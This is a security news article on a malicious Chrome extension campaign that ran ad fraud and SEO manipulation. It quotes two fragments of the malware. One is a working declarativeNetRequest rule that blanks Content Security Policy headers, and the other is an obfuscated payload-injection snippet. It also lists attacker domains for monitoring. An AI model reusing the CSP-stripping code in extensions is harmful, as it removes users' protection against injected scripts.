A coordinated cyberattack involving at least 16 malicious Chrome extensions has compromised over 3.2 million users worldwide, exploiting browser security vulnerabilities to conduct advertising fraud and manipulate search engine optimization (SEO).
Discovered by GitLab Threat Intelligence in February 2025, the malicious extensions, including screen capture tools and ad blockers, hijacked user sessions, bypassed essential security measures, and injected obfuscated payloads to manipulate browsing behavior. Despite being removed from the Chrome Web Store, the risk persists for users who have not manually uninstalled the extensions.
Security experts at GitLab found that the campaign’s complexity revolved around manipulating browser defenses, particularly through stripping Content Security Policy (CSP) headers. CSP headers are crucial in preventing cross-site scripting (XSS) attacks, and by stripping these protections, attackers created a more permissive environment for malicious script injections.
How the Attack Worked: Content Security Policy Stripping
Extensions like Nimble Capture and KProxy used service workers to remove CSP headers from the first 2,000 websites visited per session. This allowed attackers to inject harmful scripts into those sites without the usual security barriers.
The code below demonstrates how attackers leveraged Chrome’s declarativeNetRequest API to nullify CSP protections:
javascriptCopyasync function u(e) {
if (!(i.indexOf(e) > -1)) {
i.push(e);
try {
return s > 1999 && (s = 1), s++, chrome.declarativeNetRequest.updateDynamicRules({
addRules: [{
id: s,
action: {
type: "modifyHeaders",
responseHeaders: [{
header: "content-security-policy",
operation: "set",
value: ""
}]
},
condition: {
urlFilter: e,
resourceTypes: ["main_frame", "sub_frame"]
}
}],
removeRuleIds: [s]
})
} catch (t) {}
}
}
By disabling CSP, the attackers opened the door for injecting scripts and connected the extensions to remote configuration servers (e.g., api.nimblecapture[.]com) to download obfuscated JavaScript payloads.
These payloads, such as rcx-cd-v3.js, established bidirectional communication channels between the victim’s browser and the attacker’s infrastructure, hosted on platforms like Bunny CDN and DigitalOcean Apps. A unique x-do-app-origin header (e.g., 978bc8ed-09a8-444b-9142-df5a19366612) was used to tie all traffic to a single backend server.
Multi-Stage Delivery Chain
Once the CSP was stripped, the extensions loaded malicious configurations with dynamically generated UUIDs and hashed hostnames. For example, Nimble Capture injected rcx-cd-v3.js into web pages, which then bridged Chrome’s privileged APIs (like chrome.declarativeNetRequest) to the page context, enabling attackers to:
- Modify ad display rules to prioritize fraudulent ads.
- Block analytics services such as Microsoft Clarity.
- Redirect affiliate traffic to domains like AliExpress and Surfshark via injected iframes.
Here’s an example of one of the injected scripts:
javascriptCopyasync function YOKoc() {
let sKBoc = await vsRead("s");
if (["DE", "FR", "GB"].includes(getGeo()) && getDomain().indexOf("amazon") > -1) {
await Eftnc();
let MZfpc = await ceqnc("/exporter/get-campaign", { /* ... */ });
if (MZfpc) gVWoc(MZfpc.d);
}
}
Additionally, these scripts harvested browsing histories and session cookies, potentially exposing user credentials and other sensitive data.
User Impact
Victims of the malicious extensions reported unexpected redirects and degraded performance—common indicators of the ongoing attack. These behaviors point to how the extensions operated to facilitate fraudulent ad display and redirect traffic.
Systemic Vulnerabilities and Attack Strategies
This campaign underscores significant vulnerabilities within the browser extension ecosystem. By taking control of legitimate developer accounts rather than exploiting code flaws, the attackers bypassed Google’s security review process and distributed malicious extensions that appeared trustworthy.
Mitigation and Recommendations
To protect against such attacks, organizations should regularly audit extension permissions and monitor for suspicious traffic directed at domains like blipshotextension[.]com or orkproxyservers[.]site. For individual users, it’s crucial to remain vigilant when granting broad permissions to extensions, as well as to promptly remove any suspicious extensions.
